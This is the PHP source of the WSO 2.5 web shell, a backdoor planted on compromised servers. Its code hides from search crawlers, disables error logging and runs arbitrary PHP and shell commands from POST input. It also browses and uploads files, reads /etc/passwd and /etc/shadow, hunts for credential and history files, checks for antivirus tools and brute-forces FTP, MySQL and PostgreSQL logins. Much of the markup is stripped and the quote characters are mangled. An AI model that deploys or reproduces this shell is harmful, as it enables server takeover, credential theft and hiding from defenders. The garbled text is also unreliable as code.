< ?php $auth_pass = "63a9f0ea7bb98050796b649e85481845"; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('WSO_VERSION', '2.5'); if(get_magic_quotes_gpc()) { function WSOstripslashes($array) { return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array); } $_POST = WSOstripslashes($_POST); $_COOKIE = WSOstripslashes($_COOKIE); } function wsoLogin() { die("

Password: “locate ‘.pwd'”, “locate .sql files” => “locate ‘.sql'”, “locate .htpasswd files” => “locate ‘.htpasswd'”, “locate .bash_history files” => “locate ‘.bash_history'”, “locate .mysql_history files” => “locate ‘.mysql_history'”, “locate .fetchmailrc files” => “locate ‘.fetchmailrc'”, “locate backup files” => “locate backup”, “locate dump files” => “locate dump”, “locate priv files” => “locate priv” ); function wsoHeader() { if(empty($_POST[‘charset’])) $_POST[‘charset’] = $GLOBALS[‘default_charset’]; global $color; echo “” . $_SERVER[‘HTTP_HOST’] . ” – WSO ” . WSO_VERSION .”
"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://exploit-db.com/search/?action=search&filter_description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i< $n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= ''; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '[ '.$k.' ]'; $drives = ""; if($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if(is_dir($drive.':\\')) $drives .= '[ '.$drive.' ] '; } echo '' . '' . '
Uname:
User:
Php:
Hdd:
Cwd:' . ($GLOBALS['os'] == 'win'?'
Drives:':'') . '
' . substr(@php_uname(), 0, 120) . ' [exploit-db.com]
' . $uid . ' ( ' . $user . ' ) Group: ' . $gid . ' ( ' . $group . ' )
' . @phpversion() . ' Safe mode: ' . ($GLOBALS['safe_mode']?'ON':'OFF') . ' [ phpinfo ] Datetime: ' . date('Y-m-d H:i:s') . '
' . wsoViewSize($totalSpace) . ' Free: ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)
' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' [ home ]
' . $drives . '

Server IP:
' . @$_SERVER["SERVER_ADDR"] . '
Client IP:
' . $_SERVER['REMOTE_ADDR'] . '
' . '' . $menu . '
'; } function wsoFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" (Writeable)":" (Not writable)"; echo "
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
Upload file:$is_writable

“; } if (!function_exists(“posix_getpwuid”) && (strpos($GLOBALS[‘disable_functions’], ‘posix_getpwuid’)===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists(“posix_getgrgid”) && (strpos($GLOBALS[‘disable_functions’], ‘posix_getgrgid’)===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = ”; if (function_exists(‘exec’)) { @exec($in,$out); $out = @join(“\n”,$out); } elseif (function_exists(‘passthru’)) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists(‘system’)) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists(‘shell_exec’)) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,”r”))) { $out = “”; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if (is_int($s)) $s = sprintf(“%u”, $s); if($s >= 1073741824) return sprintf(‘%1.2f’, $s / 1073741824 ). ‘ GB’; elseif($s >= 1048576) return sprintf(‘%1.2f’, $s / 1048576 ) . ‘ MB’; elseif($s >= 1024) return sprintf(‘%1.2f’, $s / 1024 ) . ‘ KB’; else return $s . ‘ B’; } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = ‘s’; elseif (($p & 0xA000) == 0xA000)$i = ‘l’; elseif (($p & 0x8000) == 0x8000)$i = ‘-‘; elseif (($p & 0x6000) == 0x6000)$i = ‘b’; elseif (($p & 0x4000) == 0x4000)$i = ‘d’; elseif (($p & 0x2000) == 0x2000)$i = ‘c’; elseif (($p & 0x1000) == 0x1000)$i = ‘p’; else $i = ‘u’; $i .= (($p & 0x0100) ? ‘r’ : ‘-‘); $i .= (($p & 0x0080) ? ‘w’ : ‘-‘); $i .= (($p & 0x0040) ? (($p & 0x0800) ? ‘s’ : ‘x’ ) : (($p & 0x0800) ? ‘S’ : ‘-‘)); $i .= (($p & 0x0020) ? ‘r’ : ‘-‘); $i .= (($p & 0x0010) ? ‘w’ : ‘-‘); $i .= (($p & 0x0008) ? (($p & 0x0400) ? ‘s’ : ‘x’ ) : (($p & 0x0400) ? ‘S’ : ‘-‘)); $i .= (($p & 0x0004) ? ‘r’ : ‘-‘); $i .= (($p & 0x0002) ? ‘w’ : ‘-‘); $i .= (($p & 0x0001) ? (($p & 0x0200) ? ‘t’ : ‘x’ ) : (($p & 0x0200) ? ‘T’ : ‘-‘)); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return ‘‘ . wsoPerms(@fileperms($f)) . ‘‘; elseif (!@is_writable($f)) return ‘‘ . wsoPerms(@fileperms($f)) . ‘‘; else return ‘‘ . wsoPerms(@fileperms($f)) . ‘‘; } function wsoScandir($dir) { if(function_exists(“scandir”)) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx(‘which ‘ . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { wsoHeader(); echo ‘

Server security information

‘; function wsoSecParam($n, $v) { $v = trim($v); if($v) { echo ‘‘ . $n . ‘: ‘; if(strpos($v, “\n”) === false) echo $v . ‘
‘; else echo ‘
' . $v . '

‘;
}
}

wsoSecParam(‘Server software’, @getenv(‘SERVER_SOFTWARE’));
if(function_exists(‘apache_get_modules’))
wsoSecParam(‘Loaded Apache modules’, implode(‘, ‘, apache_get_modules()));
wsoSecParam(‘Disabled PHP Functions’, $GLOBALS[‘disable_functions’]?$GLOBALS[‘disable_functions’]:’none’);
wsoSecParam(‘Open base dir’, @ini_get(‘open_basedir’));
wsoSecParam(‘Safe mode exec dir’, @ini_get(‘safe_mode_exec_dir’));
wsoSecParam(‘Safe mode include dir’, @ini_get(‘safe_mode_include_dir’));
wsoSecParam(‘cURL support’, function_exists(‘curl_version’)?’enabled’:’no’);
$temp=array();
if(function_exists(‘mysql_get_client_info’))
$temp[] = “MySql (“.mysql_get_client_info().”)”;
if(function_exists(‘mssql_connect’))
$temp[] = “MSSQL”;
if(function_exists(‘pg_connect’))
$temp[] = “PostgreSQL”;
if(function_exists(‘oci_connect’))
$temp[] = “Oracle”;
wsoSecParam(‘Supported databases’, implode(‘, ‘, $temp));
echo ‘
‘;

if($GLOBALS[‘os’] == ‘nix’) {
wsoSecParam(‘Readable /etc/passwd’, @is_readable(‘/etc/passwd’)?”yes [view]“:’no’);
wsoSecParam(‘Readable /etc/shadow’, @is_readable(‘/etc/shadow’)?”yes [view]“:’no’);
wsoSecParam(‘OS version’, @file_get_contents(‘/proc/version’));
wsoSecParam(‘Distr name’, @file_get_contents(‘/etc/issue.net’));
if(!$GLOBALS[‘safe_mode’]) {
$userful = array(‘gcc’,’lcc’,’cc’,’ld’,’make’,’php’,’perl’,’python’,’ruby’,’tar’,’gzip’,’bzip’,’bzip2′,’nc’,’locate’,’suidperl’);
$danger = array(‘kav’,’nod32′,’bdcored’,’uvscan’,’sav’,’drwebd’,’clamd’,’rkhunter’,’chkrootkit’,’iptables’,’ipfw’,’tripwire’,’shieldcc’,’portsentry’,’snort’,’ossec’,’lidsadm’,’tcplodg’,’sxid’,’logcheck’,’logwatch’,’sysmask’,’zmbscap’,’sawmill’,’wormscan’,’ninja’);
$downloaders = array(‘wget’,’fetch’,’lynx’,’links’,’curl’,’get’,’lwp-mirror’);
echo ‘
‘;
$temp=array();
foreach ($userful as $item)
if(wsoWhich($item))
$temp[] = $item;
wsoSecParam(‘Userful’, implode(‘, ‘,$temp));
$temp=array();
foreach ($danger as $item)
if(wsoWhich($item))
$temp[] = $item;
wsoSecParam(‘Danger’, implode(‘, ‘,$temp));
$temp=array();
foreach ($downloaders as $item)
if(wsoWhich($item))
$temp[] = $item;
wsoSecParam(‘Downloaders’, implode(‘, ‘,$temp));
echo ‘
‘;
wsoSecParam(‘HDD space’, wsoEx(‘df -h’));
wsoSecParam(‘Hosts’, @file_get_contents(‘/etc/hosts’));
echo ‘
posix_getpwuid (“Read” /etc/passwd)

From
To

‘;
wsoSecParam(‘Users’, $temp);
}
}
} else {
wsoSecParam(‘OS Version’,wsoEx(‘ver’));
wsoSecParam(‘Account Settings’,wsoEx(‘net accounts’));
wsoSecParam(‘User Accounts’,wsoEx(‘net user’));
}
echo ‘

‘;
wsoFooter();
}

function actionPhp() {
if(isset($_POST[‘ajax’])) {
WSOsetcookie(md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’, true);
ob_start();
eval($_POST[‘p1’]);
$temp = “document.getElementById(‘PhpOutput’).style.display=”;document.getElementById(‘PhpOutput’).innerHTML='” . addcslashes(htmlspecialchars(ob_get_clean()), “\n\r\t\\’\0”) . “‘;\n”;
echo strlen($temp), “\n”, $temp;
exit;
}
if(empty($_POST[‘ajax’]) && !empty($_POST[‘p1’]))
WSOsetcookie(md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’, 0);

wsoHeader();
if(isset($_POST[‘p2’]) && ($_POST[‘p2’] == ‘info’)) {
echo ‘

PHP info

‘;
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace(array (
‘!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU’,
‘!td, th {(.*)}!msiU’,
‘!]+>!msiU’,
), array (
”,
‘.e, .v, .h, .h th {$1}’,

), $tmp);
echo str_replace(‘

‘;
}
echo ‘

Execution PHP-code

‘;
echo ‘ send using AJAX
';
    if(!empty($_POST['p1'])) {
        ob_start();
        eval($_POST['p1']);
        echo htmlspecialchars(ob_get_clean());
    }
    echo '

‘;
wsoFooter();
}

function actionFilesMan() {
if (!empty ($_COOKIE[‘f’]))
$_COOKIE[‘f’] = @unserialize($_COOKIE[‘f’]);

if(!empty($_POST[‘p1’])) {
switch($_POST[‘p1’]) {
case ‘uploadFile’:
if(!@move_uploaded_file($_FILES[‘f’][‘tmp_name’], $_FILES[‘f’][‘name’]))
echo “Can’t upload file!”;
break;
case ‘mkdir’:
if(!@mkdir($_POST[‘p2’]))
echo “Can’t create new dir”;
break;
case ‘delete’:
function deleteDir($path) {
$path = (substr($path,-1)==’/’) ? $path:$path.’/’;
$dh = opendir($path);
while ( ($item = readdir($dh) ) !== false) {
$item = $path.$item;
if ( (basename($item) == “..”) || (basename($item) == “.”) )
continue;
$type = filetype($item);
if ($type == “dir”)
deleteDir($item);
else
@unlink($item);
}
closedir($dh);
@rmdir($path);
}
if(is_array(@$_POST[‘f’]))
foreach($_POST[‘f’] as $f) {
if($f == ‘..’)
continue;
$f = urldecode($f);
if(is_dir($f))
deleteDir($f);
else
@unlink($f);
}
break;
case ‘paste’:
if($_COOKIE[‘act’] == ‘copy’) {
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if (($f != “.”) and ($f != “..”))
copy_paste($c.$s.’/’,$f, $d.$s.’/’);
} elseif(is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_COOKIE[‘f’] as $f)
copy_paste($_COOKIE[‘c’],$f, $GLOBALS[‘cwd’]);
} elseif($_COOKIE[‘act’] == ‘move’) {
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if (($f != “.”) and ($f != “..”))
copy_paste($c.$s.’/’,$f, $d.$s.’/’);
} elseif(@is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_COOKIE[‘f’] as $f)
@rename($_COOKIE[‘c’].$f, $GLOBALS[‘cwd’].$f);
} elseif($_COOKIE[‘act’] == ‘zip’) {
if(class_exists(‘ZipArchive’)) {
$zip = new ZipArchive();
if ($zip->open($_POST[‘p2’], 1)) {
chdir($_COOKIE[‘c’]);
foreach($_COOKIE[‘f’] as $f) {
if($f == ‘..’)
continue;
if(@is_file($_COOKIE[‘c’].$f))
$zip->addFile($_COOKIE[‘c’].$f, $f);
elseif(@is_dir($_COOKIE[‘c’].$f)) {
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.’/’, FilesystemIterator::SKIP_DOTS));
foreach ($iterator as $key=>$value) {
$zip->addFile(realpath($key), $key);
}
}
}
chdir($GLOBALS[‘cwd’]);
$zip->close();
}
}
} elseif($_COOKIE[‘act’] == ‘unzip’) {
if(class_exists(‘ZipArchive’)) {
$zip = new ZipArchive();
foreach($_COOKIE[‘f’] as $f) {
if($zip->open($_COOKIE[‘c’].$f)) {
$zip->extractTo($GLOBALS[‘cwd’]);
$zip->close();
}
}
}
} elseif($_COOKIE[‘act’] == ‘tar’) {
chdir($_COOKIE[‘c’]);
$_COOKIE[‘f’] = array_map(‘escapeshellarg’, $_COOKIE[‘f’]);
wsoEx(‘tar cfzv ‘ . escapeshellarg($_POST[‘p2’]) . ‘ ‘ . implode(‘ ‘, $_COOKIE[‘f’]));
chdir($GLOBALS[‘cwd’]);
}
unset($_COOKIE[‘f’]);
setcookie(‘f’, ”, time() – 3600);
break;
default:
if(!empty($_POST[‘p1’])) {
WSOsetcookie(‘act’, $_POST[‘p1’]);
WSOsetcookie(‘f’, serialize(@$_POST[‘f’]));
WSOsetcookie(‘c’, @$_POST[‘c’]);
}
break;
}
}
wsoHeader();
echo ‘

File manager

‘;
$dirContent = wsoScandir(isset($_POST[‘c’])?$_POST[‘c’]:$GLOBALS[‘cwd’]);
if($dirContent === false) { echo ‘Can\’t open this folder!’;wsoFooter(); return; }
global $sort;
$sort = array(‘name’, 1);
if(!empty($_POST[‘p1’])) {
if(preg_match(‘!s_([A-z]+)_(\d{1})!’, $_POST[‘p1’], $match))
$sort = array($match[1], (int)$match[2]);
}
echo “

";
$dirs = $files = array();
$n = count($dirContent);
for($i=0;$i< $n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i],
'path' => $GLOBALS['cwd'].$dirContent[$i],
'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
);
if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
$files[] = array_merge($tmp, array('type' => 'file'));
elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i]))
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}
$GLOBALS['sort'] = $sort;
function wsoCmp($a, $b) {
if($GLOBALS['sort'][0] != 'size')
return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
else
return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "wsoCmp"); usort($dirs, "wsoCmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo '

';
$l = $l?0:1;
}
echo "

Name Size Modify Owner/Group Permissions Actions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '>[ ' . htmlspecialchars($f['name']) . ' ]').' '.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).' '.$f['modify'].' '.$f['owner'].'/'.$f['group'].' '.$f['perms']
.'
R T'.(($f['type']=='file')?' E D':'').'



 ";
if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
echo "file name:  ";
echo "

“;
wsoFooter();
}

function actionStringTools() {
if(!function_exists(‘hex2bin’)) {function hex2bin($p) {return decbin(hexdec($p));}}
if(!function_exists(‘binhex’)) {function binhex($p) {return dechex(bindec($p));}}
if(!function_exists(‘hex2ascii’)) {function hex2ascii($p){$r=”;for($i=0;$i ‘base64_encode’,
‘Base64 decode’ => ‘base64_decode’,
‘Url encode’ => ‘urlencode’,
‘Url decode’ => ‘urldecode’,
‘Full urlencode’ => ‘full_urlencode’,
‘md5 hash’ => ‘md5’,
‘sha1 hash’ => ‘sha1’,
‘crypt’ => ‘crypt’,
‘CRC32’ => ‘crc32’,
‘ASCII to HEX’ => ‘ascii2hex’,
‘HEX to ASCII’ => ‘hex2ascii’,
‘HEX to DEC’ => ‘hexdec’,
‘HEX to BIN’ => ‘hex2bin’,
‘DEC to HEX’ => ‘dechex’,
‘DEC to BIN’ => ‘decbin’,
‘BIN to HEX’ => ‘binhex’,
‘BIN to DEC’ => ‘bindec’,
‘String to lower case’ => ‘strtolower’,
‘String to upper case’ => ‘strtoupper’,
‘Htmlspecialchars’ => ‘htmlspecialchars’,
‘String length’ => ‘strlen’,
);
if(isset($_POST[‘ajax’])) {
WSOsetcookie(md5($_SERVER[‘HTTP_HOST’]).’ajax’, true);
ob_start();
if(in_array($_POST[‘p1’], $stringTools))
echo $_POST[‘p1’]($_POST[‘p2’]);
$temp = “document.getElementById(‘strOutput’).style.display=”;document.getElementById(‘strOutput’).innerHTML='”.addcslashes(htmlspecialchars(ob_get_clean()),”\n\r\t\\’\0″).”‘;\n”;
echo strlen($temp), “\n”, $temp;
exit;
}
if(empty($_POST[‘ajax’])&&!empty($_POST[‘p1’]))
WSOsetcookie(md5($_SERVER[‘HTTP_HOST’]).’ajax’, 0);
wsoHeader();
echo ‘

String conversions

‘;
echo “
send using AJAX
";
    if(!empty($_POST['p1'])) {
        if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
    }
    echo"

Search files:

Text:
Path:
Name:
“.htmlspecialchars($item).”
“;
}
}
}
}
if(@$_POST[‘p3’])
wsoRecursiveGlob($_POST[‘c’]);
echo “

Search for hash:






“;
wsoFooter();
}

function actionFilesTools() {
if( isset($_POST[‘p1’]) )
$_POST[‘p1’] = urldecode($_POST[‘p1’]);
if(@$_POST[‘p2′]==’download’) {
if(@is_file($_POST[‘p1’]) && @is_readable($_POST[‘p1’])) {
ob_start(“ob_gzhandler”, 4096);
header(“Content-Disposition: attachment; filename=”.basename($_POST[‘p1’]));
if (function_exists(“mime_content_type”)) {
$type = @mime_content_type($_POST[‘p1’]);
header(“Content-Type: ” . $type);
} else
header(“Content-Type: application/octet-stream”);
$fp = @fopen($_POST[‘p1’], “r”);
if($fp) {
while(!@feof($fp))
echo @fread($fp, 1024);
fclose($fp);
}
}exit;
}
if( @$_POST[‘p2’] == ‘mkfile’ ) {
if(!file_exists($_POST[‘p1’])) {
$fp = @fopen($_POST[‘p1’], ‘w’);
if($fp) {
$_POST[‘p2’] = “edit”;
fclose($fp);
}
}
}
wsoHeader();
echo ‘

File tools

‘;
if( !file_exists(@$_POST[‘p1’]) ) {
echo ‘File not exists’;
wsoFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST[‘p1’]));
if(!$uid) {
$uid[‘name’] = @fileowner($_POST[‘p1’]);
$gid[‘name’] = @filegroup($_POST[‘p1’]);
} else $gid = @posix_getgrgid(@filegroup($_POST[‘p1’]));
echo ‘Name: ‘.htmlspecialchars(@basename($_POST[‘p1′])).’ Size: ‘.(is_file($_POST[‘p1’])?wsoViewSize(filesize($_POST[‘p1′])):’-‘).’ Permission: ‘.wsoPermsColor($_POST[‘p1′]).’ Owner/Group: ‘.$uid[‘name’].’/’.$gid[‘name’].’
‘;
echo ‘Change time: ‘.date(‘Y-m-d H:i:s’,filectime($_POST[‘p1′])).’ Access time: ‘.date(‘Y-m-d H:i:s’,fileatime($_POST[‘p1′])).’ Modify time: ‘.date(‘Y-m-d H:i:s’,filemtime($_POST[‘p1′])).’

‘;
if( empty($_POST[‘p2’]) )
$_POST[‘p2’] = ‘view’;
if( is_file($_POST[‘p1’]) )
$m = array(‘View’, ‘Highlight’, ‘Download’, ‘Hexdump’, ‘Edit’, ‘Chmod’, ‘Rename’, ‘Touch’);
else
$m = array(‘Chmod’, ‘Rename’, ‘Touch’);
foreach($m as $v)
echo ‘‘.((strtolower($v)==@$_POST[‘p2′])?’[ ‘.$v.’ ]‘:$v).’ ‘;
echo ‘

‘;
switch($_POST[‘p2’]) {
case ‘view’:
echo ‘

';
            $fp = @fopen($_POST['p1'], 'r');
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo '

‘;
break;
case ‘highlight’:
if( @is_readable($_POST[‘p1’]) ) {
echo ‘

‘;
$code = @highlight_file($_POST[‘p1’],true);
echo str_replace(array(‘‘), array(‘‘),$code).’

‘;
}
break;
case ‘chmod’:
if( !empty($_POST[‘p3’]) ) {
$perms = 0;
for($i=strlen($_POST[‘p3’])-1;$i>=0;–$i)
$perms += (int)$_POST[‘p3’][$i]*pow(8, (strlen($_POST[‘p3’])-$i-1));
if(!@chmod($_POST[‘p1’], $perms))
echo ‘Can\’t set permissions!
‘;
}
clearstatcache();
echo ‘

‘;
@touch($_POST[‘p1’],$time,$time);
}
}
echo ‘
'.$h[0].'

'.$h[1].'
'.htmlspecialchars($h[2]).'

‘;
break;
case ‘rename’:
if( !empty($_POST[‘p3’]) ) {
if(!@rename($_POST[‘p1’], $_POST[‘p3’]))
echo ‘Can\’t rename!
‘;
else
die(‘‘);
}
echo ‘

echo '

Console

send using AJAX redirect stderr to stdout (2>&1)

$

';
echo '

‘;
wsoFooter();
}

function actionLogout() {
setcookie(md5($_SERVER[‘HTTP_HOST’]), ”, time() – 3600);
die(‘bye!’);
}

function actionSelfRemove() {

if($_POST[‘p1’] == ‘yes’)
if(@unlink(preg_replace(‘!\(\d+\)\s.*!’, ”, __FILE__)))
die(‘Shell has been removed’);
else
echo ‘unlink error!’;
if($_POST[‘p1’] != ‘yes’)
wsoHeader();
echo ‘

Suicide

Really want to remove the shell?
Yes

‘;
wsoFooter();
}

function actionBruteforce() {
wsoHeader();
if( isset($_POST[‘proto’]) ) {
echo ‘

Results

Type: ‘.htmlspecialchars($_POST[‘proto’]).’ Server: ‘.htmlspecialchars($_POST[‘server’]).’
‘;
if( $_POST[‘proto’] == ‘ftp’ ) {
function wsoBruteForce($ip,$port,$login,$pass) {
$fp = @ftp_connect($ip, $port?$port:21);
if(!$fp) return false;
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif( $_POST[‘proto’] == ‘mysql’ ) {
function wsoBruteForce($ip,$port,$login,$pass) {
$res = @mysql_connect($ip.’:’.($port?$port:3306), $login, $pass);
@mysql_close($res);
return $res;
}
} elseif( $_POST[‘proto’] == ‘pgsql’ ) {
function wsoBruteForce($ip,$port,$login,$pass) {
$str = “host='”.$ip.”‘ port='”.$port.”‘ user='”.$login.”‘ password='”.$pass.”‘ dbname=postgres”;
$res = @pg_connect($str);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(“:”, $_POST[‘server’]);
if($_POST[‘type’] == 1) {
$temp = @file(‘/etc/passwd’);
if( is_array($temp) )
foreach($temp as $line) {
$line = explode(“:”, $line);
++$attempts;
if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
$success++;
echo ‘‘.htmlspecialchars($line[0]).’:’.htmlspecialchars($line[0]).’
‘;
}
if(@$_POST[‘reverse’]) {
$tmp = “”;
for($i=strlen($line[0])-1; $i>=0; –$i)
$tmp .= $line[0][$i];
++$attempts;
if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
$success++;
echo ‘‘.htmlspecialchars($line[0]).’:’.htmlspecialchars($tmp);
}
}
}
} elseif($_POST[‘type’] == 2) {
$temp = @file($_POST[‘dict’]);
if( is_array($temp) )
foreach($temp as $line) {
$line = trim($line);
++$attempts;
if( wsoBruteForce($server[0],@$server[1], $_POST[‘login’], $line) ) {
$success++;
echo ‘‘.htmlspecialchars($_POST[‘login’]).’:’.htmlspecialchars($line).’
‘;
}
}
}
echo “Attempts: $attempts Success: $success

“;
}
echo ‘

Bruteforce


.’


.’


.’


.’


.’


.’


.’

Type

.’
.’
.’
.’Server:port
Brute type


.’


.’


.’

Login
Dictionary


.’

‘);
}
wsoHeader();
echo ”

Sql browser

Type Host Login Password Database
“;
$tmp = ““;
if(isset($_POST[‘sql_host’])){
if($db->connect($_POST[‘sql_host’], $_POST[‘sql_login’], $_POST[‘sql_pass’], $_POST[‘sql_base’])) {
switch($_POST[‘charset’]) {
case “Windows-1251”: $db->setCharset(‘cp1251’); break;
case “UTF-8”: $db->setCharset(‘utf8’); break;
case “KOI8-R”: $db->setCharset(‘koi8r’); break;
case “KOI8-U”: $db->setCharset(‘koi8u’); break;
case “cp866”: $db->setCharset(‘cp866’); break;
}
$db->listDbs();
echo “‘;
}
else echo $tmp;
}else
echo $tmp;
echo “
count the number of rows

";
if(isset($db) && $db->link){
echo "

";
if(!empty($_POST['sql_base'])){
$db->selectdb($_POST['sql_base']);
echo "
Tables:

";
$tbls_res = $db->listTables();
while($item = $db->fetch($tbls_res)) {
list($key, $value) = each($item);
if(!empty($_POST['sql_count']))
$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
$value = htmlspecialchars($value);
echo " ".$value."" . (empty($_POST['sql_count'])?' ':" ({$n['n']})") . "
";
}
echo "
File path:

";
if(@$_POST['p1'] == 'select') {
$_POST['p1'] = 'query';
$_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
$num = $db->fetch();
$pages = ceil($num['n'] / 30);
echo "".$_POST['p2']." ({$num['n']} records) Page # ";
echo " of $pages";
if($_POST['p3'] > 1)
echo " < Prev";
if($_POST['p3'] < $pages) echo " Next >";
$_POST['p3']--;
if($_POST['type']=='pgsql')
$_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
else
$_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
echo "

";
}
if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
$db->query(@$_POST['p2']);
if($db->res !== false) {
$title = false;
echo '

';
$line = 1;
while($item = $db->fetch()) {
if(!$title) {
echo '
';
foreach($item as $key => $value)
echo '

';
reset($item);
$title=true;
echo '

';
$line = 2;
}
echo '';
$line = $line==1?2:1;
foreach($item as $key => $value) {
if($value == null)
echo '

';
else
echo '

';
}
echo '

';
}
echo '

'.$key.'
null '.nl2br(htmlspecialchars($value)).'

';
} else {
echo '

Error: '.htmlspecialchars($db->error()).'

';
}
}
echo "


“;
echo “”;
}
echo “

“;
if($_POST[‘type’]==’mysql’) {
$db->query(“SELECT 1 FROM mysql.user WHERE concat(`user`, ‘@’, `host`) = USER() AND `File_priv` = ‘y'”);
if($db->fetch())
echo “

Load file

‘;
}
} else {
echo htmlspecialchars($db->error());
}
echo ‘

‘;
wsoFooter();
}
function actionNetwork() {
wsoHeader();
